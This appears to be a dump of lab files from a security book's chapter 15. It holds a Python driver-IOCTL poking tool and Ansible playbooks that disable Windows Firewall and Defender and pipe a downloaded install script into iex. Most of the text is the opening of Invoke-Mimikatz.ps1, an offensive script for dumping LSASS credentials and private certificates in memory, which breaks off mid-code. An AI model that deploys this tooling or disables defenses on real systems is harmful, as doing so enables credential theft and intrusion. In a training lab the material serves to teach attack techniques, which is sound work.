def opendevice(dev):
    """Open the device at path `dev` (bytes) for read/write with full sharing.

    Returns the HANDLE from CreateFileA; its errcheck raises if the open
    fails, so a returned handle is always usable.
    """
    access = GENERIC_READ | GENERIC_WRITE
    share = FILE_SHARE_READ | FILE_SHARE_WRITE
    return CreateFileA(dev, access, share, None, OPEN_EXISTING,
                       FILE_ATTRIBUTE_NORMAL, None)
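def ioctl(hdev, ioctl, input, outbuf_len):
    """Issue one synchronous DeviceIoControl and return what came back.

    hdev: device handle from opendevice().
    ioctl: control code.
    input: bytes used as the input buffer (its length is the input size).
    outbuf_len: size of the output buffer to allocate; 0 passes no buffer.

    Returns (bytes_returned, output). bytes_returned is the driver's
    lpBytesReturned value; output is the entire output buffer as raw bytes
    (b'' when outbuf_len is 0), so binary replies are shown in full.
    The previous LPSTR(...).value form stopped at the first NUL byte and
    also let the driver write into the storage of an immutable bytes
    object; create_string_buffer gives a real writable buffer.
    A failed call is only printed by DeviceIoControl.errcheck, so callers
    should check bytes_returned rather than assume success.
    """
    outbuf = create_string_buffer(outbuf_len) if outbuf_len else None
    outret = DWORD()
    DeviceIoControl(hdev, ioctl, input, len(input), outbuf, outbuf_len,
                    byref(outret), None)
    output = outbuf.raw if outbuf else b''
    return outret.value, output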
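if __name__ == '__main__':
    import argparse
    import sys

    def _buf_or_stdin(arg):
        """argparse type for -b: "-" reads the request bytes from stdin,
        anything else is parsed as a hex string.

        Reads sys.stdin.buffer rather than the text wrapper: text mode would
        decode the input (and translate newlines on Windows), corrupting
        any non-text bytes meant for the driver.
        """
        if arg == "-":
            return sys.stdin.buffer.read()
        return bytes.fromhex(arg)

    ap = argparse.ArgumentParser()
    ap.add_argument('-d', '--device', required=True, help="Device to open",
                    type=lambda x: x.encode())
    ap.add_argument('-i', '--ioctl', required=True, help="IOCTL to invoke",
                    type=lambda x: int(x, 0))
    ap.add_argument('-b', '--buffer', type=_buf_or_stdin, default=b"",
                    help="Input buffer as hex (- for raw from stdin)")
    ap.add_argument('-o', '--output-buffer-length', default=0,
                    type=lambda x: int(x, 0), help="Output buffer length")
    ap.add_argument('-m', '--match-input-output', action='store_true',
                    help="Make output buffer size input buffer size")
    args = ap.parse_args()
    print("Device: {}\nIOCTL: 0x{:x}".format(args.device.decode(), args.ioctl))
    print("Input buffer: {}".format(args.buffer.hex()))
    if args.match_input_output:
        args.output_buffer_length = len(args.buffer)
    hdev = opendevice(args.device)
    # Release the handle even if the IOCTL path raises.
    try:
        ret, buf = ioctl(hdev, args.ioctl, args.buffer, args.output_buffer_length)
    finally:
        CloseHandle(hdev)
    print("Return value: {}\nOutput Buffer length: {}\nOutput Buffer: {}"
          .format(ret, len(buf), buf.hex()))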
================================================
FILE: ch15/Lab/ansible/ansible.cfg
================================================
[defaults]
host_key_checking = False
================================================
FILE: ch15/Lab/ansible/ch15_playbook.yml
================================================
---
- hosts: target
roles:
- common
- target_customizations
vars_files:
- vars/vars.yml
- hosts: kali
become: yes
roles:
- kali_customizations
vars_files:
- vars/vars.yml
================================================
FILE: ch15/Lab/ansible/roles/common/defaults/main.yml
================================================
---
================================================
FILE: ch15/Lab/ansible/roles/common/handlers/main.yml
================================================
---
================================================
FILE: ch15/Lab/ansible/roles/common/meta/main.yml
================================================
---
galaxy_info:
role_name: install_misc_software
author: Russ Nolen rnolen@splunk.com
description: Install some basic software
license: BSD
min_ansible_version: 2.4
platforms:
- name: Windows
versions:
- 2012R2
- Win10
galaxy_tags:
- system
- security
dependencies: []
================================================
FILE: ch15/Lab/ansible/roles/common/tasks/chocolatey-components.yml
================================================
---
- name: Install Chocolatey via Powershell
win_shell: "Set-ExecutionPolicy Bypass -Scope Process -Force; [System.Net.ServicePointManager]::SecurityProtocol = [System.Net.ServicePointManager]::SecurityProtocol -bor 3072; iwr https://chocolatey.org/install.ps1 -UseBasicParsing | iex
"
- name: Install notepadplusplus
win_chocolatey:
name: notepadplusplus
================================================
FILE: ch15/Lab/ansible/roles/common/tasks/main.yml
================================================
---
# need to wrap an if statement around this one
# make it windows specific
- name : Disable Windows Firewall
win_firewall:
state: disabled
- include: chocolatey-components.yml
================================================
FILE: ch15/Lab/ansible/roles/common/tasks/windows-components.yml
================================================
---
- name: Install the Visual C++ Redistributable
win_package:
path: "https://download.microsoft.com/download/9/3/F/93FCF1E7-E6A4-478B-96E7-D4B285925B00/vc_redist.x64.exe"
product_id: '{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}'
arguments: /install /passive /norestart
================================================
FILE: ch15/Lab/ansible/roles/common/tasks/windows-disable-defender.yml
================================================
---
- name: Disable Windows Defender
win_regedit:
key: "HKLM:\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection"
value: DisableRealTimeMonitoring
datatype: dword
data: 1
================================================
FILE: ch15/Lab/ansible/roles/kali_customizations/files/Invoke-Mimikatz.ps1
================================================
function Invoke-Mimikatz
{
<#
.SYNOPSIS
This script leverages Mimikatz 2.0 and Invoke-ReflectivePEInjection to reflectively load Mimikatz completely in memory. This allows you to do things such as
dump credentials without ever writing the mimikatz binary to disk.
The script has a ComputerName parameter which allows it to be executed against multiple computers.
This script should be able to dump credentials from any version of Windows through Windows 8.1 that has PowerShell v2 or higher installed.
Function: Invoke-Mimikatz
Author: Joe Bialek, Twitter: @JosephBialek
Mimikatz Author: Benjamin DELPY `gentilkiwi`. Blog: http://blog.gentilkiwi.com. Email: benjamin@gentilkiwi.com. Twitter @gentilkiwi
License: http://creativecommons.org/licenses/by/3.0/fr/
Required Dependencies: Mimikatz (included)
Optional Dependencies: None
Mimikatz version: 2.0 alpha (12/14/2015)
.DESCRIPTION
Reflectively loads Mimikatz 2.0 in memory using PowerShell. Can be used to dump credentials without writing anything to disk. Can be used for any
functionality provided with Mimikatz.
.PARAMETER DumpCreds
Switch: Use mimikatz to dump credentials out of LSASS.
.PARAMETER DumpCerts
Switch: Use mimikatz to export all private certificates (even if they are marked non-exportable).
.PARAMETER Command
Supply mimikatz a custom command line. This works exactly the same as running the mimikatz executable like this: mimikatz "privilege::debug exit" as an example.
.PARAMETER ComputerName
Optional, an array of computernames to run the script on.
.EXAMPLE
Execute mimikatz on the local computer to dump certificates.
Invoke-Mimikatz -DumpCerts
.EXAMPLE
Execute mimikatz on two remote computers to dump credentials.
Invoke-Mimikatz -DumpCreds -ComputerName @("computer1", "computer2")
.EXAMPLE
Execute mimikatz on a remote computer with the custom command "privilege::debug exit" which simply requests debug privilege and exits
Invoke-Mimikatz -Command "privilege::debug exit" -ComputerName "computer1"
.NOTES
This script was created by combining the Invoke-ReflectivePEInjection script written by Joe Bialek and the Mimikatz code written by Benjamin DELPY
Find Invoke-ReflectivePEInjection at: https://github.com/clymb3r/PowerShell/tree/master/Invoke-ReflectivePEInjection
Find mimikatz at: http://blog.gentilkiwi.com
.LINK
http://clymb3r.wordpress.com/2013/04/09/modifying-mimikatz-to-be-loaded-using-invoke-reflectivedllinjection-ps1/
#>
[CmdletBinding(DefaultParameterSetName="DumpCreds")]
Param(
[Parameter(Position = 0)]
[String[]]
$ComputerName,
[Parameter(ParameterSetName = "DumpCreds", Position = 1)]
[Switch]
$DumpCreds,
[Parameter(ParameterSetName = "DumpCerts", Position = 1)]
[Switch]
$DumpCerts,
[Parameter(ParameterSetName = "CustomCommand", Position = 1)]
[String]
$Command
)
Set-StrictMode -Version 2
$RemoteScriptBlock = {
[CmdletBinding()]
Param(
[Parameter(Position = 0, Mandatory = $true)]
[String]
$PEBytes64,
[Parameter(Position = 1, Mandatory = $true)]
[String]
$PEBytes32,
[Parameter(Position = 2, Mandatory = $false)]
[String]
$FuncReturnType,
[Parameter(Position = 3, Mandatory = $false)]
[Int32]
$ProcId,
[Parameter(Position = 4, Mandatory = $false)]
[String]
$ProcName,
[Parameter(Position = 5, Mandatory = $false)]
[String]
$ExeArgs
)
###################################
########## Win32 Stuff ##########
###################################
Function Get-Win32Types
{
$Win32Types = New-Object System.Object
#Define all the structures/enums that will be used
# This article shows you how to do this with reflection: http://www.exploit-monday.com/2012/07/structs-and-enums-using-reflection.html
$Domain = [AppDomain]::CurrentDomain
$DynamicAssembly = New-Object System.Reflection.AssemblyName('DynamicAssembly')
$AssemblyBuilder = $Domain.DefineDynamicAssembly($DynamicAssembly, [System.Reflection.Emit.AssemblyBuilderAccess]::Run)
$ModuleBuilder = $AssemblyBuilder.DefineDynamicModule('DynamicModule', $false)
$ConstructorInfo = [System.Runtime.InteropServices.MarshalAsAttribute].GetConstructors()[0]
############ ENUM ############
#Enum MachineType
$TypeBuilder = $ModuleBuilder.DefineEnum('MachineType', 'Public', [UInt16])
$TypeBuilder.DefineLiteral('Native', [UInt16] 0) | Out-Null
$TypeBuilder.DefineLiteral('I386', [UInt16] 0x014c) | Out-Null
$TypeBuilder.DefineLiteral('Itanium', [UInt16] 0x0200) | Out-Null
$TypeBuilder.DefineLiteral('x64', [UInt16] 0x8664) | Out-Null
$MachineType = $TypeBuilder.CreateType()
$Win32Types | Add-Member -MemberType NoteProperty -Name MachineType -Value $MachineType
#Enum MagicType
$TypeBuilder = $ModuleBuilder.DefineEnum('MagicType', 'Public', [UInt16])
$TypeBuilder.DefineLiteral('IMAGE_NT_OPTIONAL_HDR32_MAGIC', [UInt16] 0x10b) | Out-Null
$TypeBuilder.DefineLiteral('IMAGE_NT_OPTIONAL_HDR64_MAGIC', [UInt16] 0x20b) | Out-Null
$MagicType = $TypeBuilder.CreateType()
$Win32Types | Add-Member -MemberType NoteProperty -Name MagicType -Value $MagicType
#Enum SubSystemType
$TypeBuilder = $ModuleBuilder.DefineEnum('SubSystemType', 'Public', [UInt16])
$TypeBuilder.DefineLiteral('IMAGE_SUBSYSTEM_UNKNOWN', [UInt16] 0) | Out-Null
$TypeBuilder.DefineLiteral('IMAGE_SUBSYSTEM_NATIVE', [UInt16] 1) | Out-Null
$TypeBuilder.DefineLiteral('IMAGE_SUBSYSTEM_WINDOWS_GUI', [UInt16] 2) | Out-Null
$TypeBuilder.DefineLiteral('IMAGE_SUBSYSTEM_WINDOWS_CUI', [UInt16] 3) | Out-Null
$TypeBuilder.DefineLiteral('IMAGE_SUBSYSTEM_POSIX_CUI', [UInt16] 7) | Out-Null
$TypeBuilder.DefineLiteral('IMAGE_SUBSYSTEM_WINDOWS_CE_GUI', [UInt16] 9) | Out-Null
$TypeBuilder.DefineLiteral('IMAGE_SUBSYSTEM_EFI_APPLICATION', [UInt16] 10) | Out-Null
$TypeBuilder.DefineLiteral('IMAGE_SUBSYSTEM_EFI_BOOT_SERVICE_DRIVER', [UInt16] 11) | Out-Null
$TypeBuilder.DefineLiteral('IMAGE_SUBSYSTEM_EFI_RUNTIME_DRIVER', [UInt16] 12) | Out-Null
$TypeBuilder.DefineLiteral('IMAGE_SUBSYSTEM_EFI_ROM', [UInt16] 13) | Out-Null
$TypeBuilder.DefineLiteral('IMAGE_SUBSYSTEM_XBOX', [UInt16] 14) | Out-Null
$SubSystemType = $TypeBuilder.CreateType()
$Win32Types | Add-Member -MemberType NoteProperty -Name SubSystemType -Value $SubSystemType
#Enum DllCharacteristicsType
$TypeBuilder = $ModuleBuilder.DefineEnum('DllCharacteristicsType', 'Public', [UInt16])
$TypeBuilder.DefineLiteral('RES_0', [UInt16] 0x0001) | Out-Null
$TypeBuilder.DefineLiteral('RES_1', [UInt16] 0x0002) | Out-Null
$TypeBuilder.DefineLiteral('RES_2', [UInt16] 0x0004) | Out-Null
$TypeBuilder.DefineLiteral('RES_3', [UInt16] 0x0008) | Out-Null
$TypeBuilder.DefineLiteral('IMAGE_DLL_CHARACTERISTICS_DYNAMIC_BASE', [UInt16] 0x0040) | Out-Null
$TypeBuilder.DefineLiteral('IMAGE_DLL_CHARACTERISTICS_FORCE_INTEGRITY', [UInt16] 0x0080) | Out-Null
$TypeBuilder.DefineLiteral('IMAGE_DLL_CHARACTERISTICS_NX_COMPAT', [UInt16] 0x0100) | Out-Null
$TypeBuilder.DefineLiteral('IMAGE_DLLCHARACTERISTICS_NO_ISOLATION', [UInt16] 0x0200) | Out-Null
$TypeBuilder.DefineLiteral('IMAGE_DLLCHARACTERISTICS_NO_SEH', [UInt16] 0x0400) | Out-Null
$TypeBuilder.DefineLiteral('IMAGE_DLLCHARACTERISTICS_NO_BIND', [UInt16] 0x0800) | Out-Null
$TypeBuilder.DefineLiteral('RES_4', [UInt16] 0x1000) | Out-Null
$TypeBuilder.DefineLiteral('IMAGE_DLLCHARACTERISTICS_WDM_DRIVER', [UInt16] 0x2000) | Out-Null
$TypeBuilder.DefineLiteral('IMAGE_DLLCHARACTERISTICS_TERMINAL_SERVER_AWARE', [UInt16] 0x8000) | Out-Null
$DllCharacteristicsType = $TypeBuilder.CreateType()
$Win32Types | Add-Member -MemberType NoteProperty -Name DllCharacteristicsType -Value $DllCharacteristicsType
########### STRUCT ###########
#Struct IMAGE_DATA_DIRECTORY
$Attributes = 'AutoLayout, AnsiClass, Class, Public, ExplicitLayout, Sealed, BeforeFieldInit'
$TypeBuilder = $ModuleBuilder.DefineType('IMAGE_DATA_DIRECTORY', $Attributes, [System.ValueType], 8)
($TypeBuilder.DefineField('VirtualAddress', [UInt32], 'Public')).SetOffset(0) | Out-Null
($TypeBuilder.DefineField('Size', [UInt32], 'Public')).SetOffset(4) | Out-Null
$IMAGE_DATA_DIRECTORY = $TypeBuilder.CreateType()
$Win32Types | Add-Member -MemberType NoteProperty -Name IMAGE_DATA_DIRECTORY -Value $IMAGE_DATA_DIRECTORY
#Struct IMAGE_FILE_HEADER
$Attributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit'
$TypeBuilder = $ModuleBuilder.DefineType('IMAGE_FILE_HEADER', $Attributes, [System.ValueType], 20)
$TypeBuilder.DefineField('Machine', [UInt16], 'Public') | Out-Null
$TypeBuilder.DefineField('NumberOfSections', [UInt16], 'Public') | Out-Null
$TypeBuilder.DefineField('TimeDateStamp', [UInt32], 'Public') | Out-Null
$TypeBuilder.DefineField('PointerToSymbolTable', [UInt32], 'Public') | Out-Null
$TypeBuilder.DefineField('NumberOfSymbols', [UInt32], 'Public') | Out-Null
$TypeBuilder.DefineField('SizeOfOptionalHeader', [UInt16], 'Public') | Out-Null
$TypeBuilder.DefineField('Characteristics', [UInt16], 'Public') | Out-Null
$IMAGE_FILE_HEADER = $TypeBuilder.CreateType()
$Win32Types | Add-Member -MemberType NoteProperty -Name IMAGE_FILE_HEADER -Value $IMAGE_FILE_HEADER
#Struct IMAGE_OPTIONAL_HEADER64
$Attributes = 'AutoLayout, AnsiClass, Class, Public, ExplicitLayout, Sealed, BeforeFieldInit'
$TypeBuilder = $ModuleBuilder.DefineType('IMAGE_OPTIONAL_HEADER64', $Attributes, [System.ValueType], 240)
($TypeBuilder.DefineField('Magic', $MagicType, 'Public')).SetOffset(0) | Out-Null
($TypeBuilder.DefineField('MajorLinkerVersion', [Byte], 'Public')).SetOffset(2) | Out-Null
($TypeBuilder.DefineField('MinorLinkerVersion', [Byte], 'Public')).SetOffset(3) | Out-Null
($TypeBuilder.DefineField('SizeOfCode', [UInt32], 'Public')).SetOffset(4) | Out-Null
($TypeBuilder.DefineField('SizeOfInitializedData', [UInt32], 'Public')).SetOffset(8) | Out-Null
($TypeBuilder.DefineField('SizeOfUninitializedData', [UInt32], 'Public')).SetOffset(12) | Out-Null
($TypeBuilder.DefineField('AddressOfEntryPoint', [UInt32], 'Public')).SetOffset(16) | Out-Null
($TypeBuilder.DefineField('BaseOfCode', [UInt32], 'Public')).SetOffset(20) | Out-Null
($TypeBuilder.DefineField('ImageBase', [UInt64], 'Public')).SetOffset(24) | Out-Null
($TypeBuilder.DefineField('SectionAlignment', [UInt32], 'Public')).SetOffset(32) | Out-Null
($TypeBuilder.DefineField('FileAlignment', [UInt32], 'Public')).SetOffset(36) | Out-Null
($TypeBuilder.DefineField('MajorOperatingSystemVersion', [UInt16], 'Public')).SetOffset(40) | Out-Null
($TypeBuilder.DefineField('MinorOperatingSystemVersion', [UInt16], 'Public')).SetOffset(42) | Out-Null
($TypeBuilder.DefineField('MajorImageVersion', [UInt16], 'Public')).SetOffset(44) | Out-Null
($TypeBuilder.DefineField('MinorImageVersion', [UInt16], 'Public')).SetOffset(46) | Out-Null
($TypeBuilder.DefineField('MajorSubsystemVersion', [UInt16], 'Public')).SetOffset(48) | Out-Null
($TypeBuilder.DefineField('MinorSubsystemVersion', [UInt16], 'Public')).SetOffset(50) | Out-Null
($TypeBuilder.DefineField('Win32VersionValue', [UInt32], 'Public')).SetOffset(52) | Out-Null
($TypeBuilder.DefineField('SizeOfImage', [UInt32], 'Public')).SetOffset(56) | Out-Null
($TypeBuilder.DefineField('SizeOfHeaders', [UInt32], 'Public')).SetOffset(60) | Out-Null
($TypeBuilder.DefineField('CheckSum', [UInt32], 'Public')).SetOffset(64) | Out-Null
($TypeBuilder.DefineField('Subsystem', $SubSystemType, 'Public')).SetOffset(68) | Out-Null
($TypeBuilder.DefineField('DllCharacteristics', $DllCharacteristicsType, 'Public')).SetOffset(70) | Out-Null
($TypeBuilder.DefineField('SizeOfStackReserve', [UInt64], 'Public')).SetOffset(72) | Out-Null
($TypeBuilder.DefineField('SizeOfStackCommit', [UInt64], 'Public')).SetOffset(80) | Out-Null
($TypeBuilder.DefineField('SizeOfHeapReserve', [UInt64], 'Public')).SetOffset(88) | Out-Null
($TypeBuilder.DefineField('SizeOfHeapCommit', [UInt64], 'Public')).SetOffset(96) | Out-Null
($TypeBuilder.DefineField('LoaderFlags', [UInt32], 'Public')).SetOffset(104) | Out-Null
($TypeBuilder.DefineField('NumberOfRvaAndSizes', [UInt32], 'Public')).SetOffset(108) | Out-Null
($TypeBuilder.DefineField('ExportTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(112) | Out-Null
($TypeBuilder.DefineField('ImportTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(120) | Out-Null
($TypeBuilder.DefineField('ResourceTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(128) | Out-Null
($TypeBuilder.DefineField('ExceptionTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(136) | Out-Null
($TypeBuilder.DefineField('CertificateTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(144) | Out-Null
($TypeBuilder.DefineField('BaseRelocationTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(152) | Out-Null
($TypeBuilder.DefineField('Debug', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(160) | Out-Null
($TypeBuilder.DefineField('Architecture', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(168) | Out-Null
($TypeBuilder.DefineField('GlobalPtr', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(176) | Out-Null
($TypeBuilder.DefineField('TLSTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(184) | Out-Null
($TypeBuilder.DefineField('LoadConfigTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(192) | Out-Null
($TypeBuilder.DefineField('BoundImport', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(200) | Out-Null
($TypeBuilder.DefineField('IAT', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(208) | Out-Null
($TypeBuilder.DefineField('DelayImportDescriptor', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(216) | Out-Null
($TypeBuilder.DefineField('CLRRuntimeHeader', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(224) | Out-Null
($TypeBuilder.DefineField('Reserved', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(232) | Out-Null
$IMAGE_OPTIONAL_HEADER64 = $TypeBuilder.CreateType()
$Win32Types | Add-Member -MemberType NoteProperty -Name IMAGE_OPTIONAL_HEADER64 -Value $IMAGE_OPTIONAL_HEADER64
#Struct IMAGE_OPTIONAL_HEADER32
$Attributes = 'AutoLayout, AnsiClass, Class, Public, ExplicitLayout, Sealed, BeforeFieldInit'
$TypeBuilder = $ModuleBuilder.DefineType('IMAGE_OPTIONAL_HEADER32', $Attributes, [System.ValueType], 224)
($TypeBuilder.DefineField('Magic', $MagicType, 'Public')).SetOffset(0) | Out-Null
($TypeBuilder.DefineField('MajorLinkerVersion', [Byte], 'Public')).SetOffset(2) | Out-Null
($TypeBuilder.DefineField('MinorLinkerVersion', [Byte], 'Public')).SetOffset(3) | Out-Null
($TypeBuilder.DefineField('SizeOfCode', [UInt32], 'Public')).SetOffset(4) | Out-Null
($TypeBuilder.DefineField('SizeOfInitializedData', [UInt32], 'Public')).SetOffset(8) | Out-Null
($TypeBuilder.DefineField('SizeOfUninitializedData', [UInt32], 'Public')).SetOffset(12) | Out-Null
($TypeBuilder.DefineField('AddressOfEntryPoint', [UInt32], 'Public')).SetOffset(16) | Out-Null
($TypeBuilder.DefineField('BaseOfCode', [UInt32], 'Public')).SetOffset(20) | Out-Null
($TypeBuilder.DefineField('BaseOfData', [UInt32], 'Public')).SetOffset(24) | Out-Null
($TypeBuilder.DefineField('ImageBase', [UInt32], 'Public')).SetOffset(28) | Out-Null
($TypeBuilder.DefineField('SectionAlignment', [UInt32], 'Public')).SetOffset(32) | Out-Null
($TypeBuilder.DefineField('FileAlignment', [UInt32], 'Public')).SetOffset(36) | Out-Null
($TypeBuilder.DefineField('MajorOperatingSystemVersion', [UInt16], 'Public')).SetOffset(40) | Out-Null
($TypeBuilder.DefineField('MinorOperatingSystemVersion', [UInt16], 'Public')).SetOffset(42) | Out-Null
($TypeBuilder.DefineField('MajorImageVersion', [UInt16], 'Public')).SetOffset(44) | Out-Null
($TypeBuilder.DefineField('MinorImageVersion', [UInt16], 'Public')).SetOffset(46) | Out-Null
($TypeBuilder.DefineField('MajorSubsystemVersion', [UInt16], 'Public')).SetOffset(48) | Out-Null
($TypeBuilder.DefineField('MinorSubsystemVersion', [UInt16], 'Public')).SetOffset(50) | Out-Null
($TypeBuilder.DefineField('Win32VersionValue', [UInt32], 'Public')).SetOffset(52) | Out-Null
($TypeBuilder.DefineField('SizeOfImage', [UInt32], 'Public')).SetOffset(56) | Out-Null
($TypeBuilder.DefineField('SizeOfHeaders', [UInt32], 'Public')).SetOffset(60) | Out-Null
($TypeBuilder.DefineField('CheckSum', [UInt32], 'Public')).SetOffset(64) | Out-Null
($TypeBuilder.DefineField('Subsystem', $SubSystemType, 'Public')).SetOffset(68) | Out-Null
($TypeBuilder.DefineField('DllCharacteristics', $DllCharacteristicsType, 'Public')).SetOffset(70) | Out-Null
($TypeBuilder.DefineField('SizeOfStackReserve', [UInt32], 'Public')).SetOffset(72) | Out-Null
($TypeBuilder.DefineField('SizeOfStackCommit', [UInt32], 'Public')).SetOffset(76) | Out-Null
($TypeBuilder.DefineField('SizeOfHeapReserve', [UInt32], 'Public')).SetOffset(80) | Out-Null
($TypeBuilder.DefineField('SizeOfHeapCommit', [UInt32], 'Public')).SetOffset(84) | Out-Null
($TypeBuilder.DefineField('LoaderFlags', [UInt32], 'Public')).SetOffset(88) | Out-Null
($TypeBuilder.DefineField('NumberOfRvaAndSizes', [UInt32], 'Public')).SetOffset(92) | Out-Null
($TypeBuilder.DefineField('ExportTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(96) | Out-Null
($TypeBuilder.DefineField('ImportTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(104) | Out-Null
($TypeBuilder.DefineField('ResourceTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(112) | Out-Null
($TypeBuilder.DefineField('ExceptionTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(120) | Out-Null
($TypeBuilder.DefineField('CertificateTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(128) | Out-Null
($TypeBuilder.DefineField('BaseRelocationTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(136) | Out-Null
($TypeBuilder.DefineField('Debug', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(144) | Out-Null
($TypeBuilder.DefineField('Architecture', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(152) | Out-Null
($TypeBuilder.DefineField('GlobalPtr', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(160) | Out-Null
($TypeBuilder.DefineField('TLSTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(168) | Out-Null
($TypeBuilder.DefineField('LoadConfigTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(176) | Out-Null
($TypeBuilder.DefineField('BoundImport', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(184) | Out-Null
($TypeBuilder.DefineField('IAT', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(192) | Out-Null
($TypeBuilder.DefineField('DelayImportDescriptor', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(200) | Out-Null
($TypeBuilder.DefineField('CLRRuntimeHeader', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(208) | Out-Null
($TypeBuilder.DefineField('Reserved', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(216) | Out-Null
$IMAGE_OPTIONAL_HEADER32 = $TypeBuilder.CreateType()
$Win32Types | Add-Member -MemberType NoteProperty -Name IMAGE_OPTIONAL_HEADER32 -Value $IMAGE_OPTIONAL_HEADER32
#Struct IMAGE_NT_HEADERS64
$Attributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit'
$TypeBuilder = $ModuleBuilder.DefineType('IMAGE_NT_HEADERS64', $Attributes, [System.ValueType], 264)
$TypeBuilder.DefineField('Signature', [UInt32], 'Public') | Out-Null
$TypeBuilder.DefineField('FileHeader', $IMAGE_FILE_HEADER, 'Public') | Out-Null
$TypeBuilder.DefineField('OptionalHeader', $IMAGE_OPTIONAL_HEADER64, 'Public') | Out-Null
$IMAGE_NT_HEADERS64 = $TypeBuilder.CreateType()
$Win32Types | Add-Member -MemberType NoteProperty -Name IMAGE_NT_HEADERS64 -Value $IMAGE_NT_HEADERS64
#Struct IMAGE_NT_HEADERS32
$Attributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit'
$TypeBuilder = $ModuleBuilder.DefineType('IMAGE_NT_HEADERS32', $Attributes, [System.ValueType], 248)
$TypeBuilder.DefineField('Signature', [UInt32], 'Public') | Out-Null
$TypeBuilder.DefineField('FileHeader', $IMAGE_FILE_HEADER, 'Public') | Out-Null
$TypeBuilder.DefineField('OptionalHeader', $IMAGE_OPTIONAL_HEADER32, 'Public') | Out-Null
$IMAGE_NT_HEADERS32 = $TypeBuilder.CreateType()
$Win32Types | Add-Member -MemberType NoteProperty -Name IMAGE_NT_HEADERS32 -Value $IMAGE_NT_HEADERS32
#Struct IMAGE_DOS_HEADER
$Attributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit'
$TypeBuilder = $ModuleBuilder.DefineType('IMAGE_DOS_HEADER', $Attributes, [System.ValueType], 64)
$TypeBuilder.DefineField('e_magic', [UInt16], 'Public') | Out-Null
$TypeBuilder.DefineField('e_cblp', [UInt16], 'Public') | Out-Null
$TypeBuilder.DefineField('e_cp', [UInt16], 'Public') | Out-Null
$TypeBuilder.DefineField('e_crlc', [UInt16], 'Public') | Out-Null
$TypeBuilder.DefineField('e_cparhdr', [UInt16], 'Public') | Out-Null
$TypeBuilder.DefineField('e_minalloc', [UInt16], 'Public') | Out-Null
$TypeBuilder.DefineField('e_maxalloc', [UInt16], 'Public') | Out-Null
$TypeBuilder.DefineField('e_ss', [UInt16], 'Public') | Out-Null
$TypeBuilder.DefineField('e_sp', [UInt16], 'Public') | Out-Null
$TypeBuilder.DefineField('e_csum', [UInt16], 'Public') | Out-Null
$TypeBuilder.DefineField('e_ip', [UInt16], 'Public') | Out-Null
$TypeBuilder.DefineField('e_cs', [UInt16], 'Public') | Out-Null
$TypeBuilder.DefineField('e_lfarlc', [UInt16], 'Public') | Out-Null
$TypeBuilder.DefineField('e_ovno', [UInt16], 'Public') | Out-Null
$e_resField = $TypeBuilder.DefineField('e_res', [UInt16[]], 'Public, HasFieldMarshal')
$ConstructorValue = [System.Runtime.InteropServices.UnmanagedType]::ByValArray
$FieldArray = @([System.Runtime.InteropServices.MarshalAsAttribute].GetField('SizeConst'))
$AttribBuilder = New-Object System.Reflection.Emit.CustomAttributeBuilder($ConstructorInfo, $ConstructorValue, $FieldArray, @([Int32] 4))
$e_resField.SetCustomAttribute($AttribBuilder)
$TypeBuilder.DefineField('e_oemid', [UInt16], 'Public') | Out-Null
$TypeBuilder.DefineField('e_oeminfo', [UInt16], 'Public') | Out-Null
$e_res2Field = $TypeBuilder.DefineField('e_res2', [UInt16[]], 'Public, HasFieldMarshal')
$ConstructorValue = [System.Runtime.InteropServices.UnmanagedType]::ByValArray
$AttribBuilder = New-Object System.Reflection.Emit.CustomAttributeBuilder($ConstructorInfo, $ConstructorValue, $FieldArray, @([Int32] 10))
$e_res2Field.SetCustomAttribute($AttribBuilder)
$TypeBuilder.DefineField('e_lfanew', [Int32], 'Public') | Out-Null
$IMAGE_DOS_HEADER = $TypeBuilder.CreateType()
$Win32Types | Add-Member -MemberType NoteProperty -Name IMAGE_DOS_HEADER -Value $IMAGE_DOS_HEADER
#Struct IMAGE_SECTION_HEADER
$Attributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit'
$TypeBuilder = $ModuleBuilder.DefineType('IMAGE_SECTION_HEADER', $Attributes, [System.ValueType], 40)
$nameField = $TypeBuilder.DefineField('Name', [Char[]], 'Public, HasFieldMarshal')
$ConstructorValue = [System.Runtime.InteropServices.UnmanagedType]::ByValArray
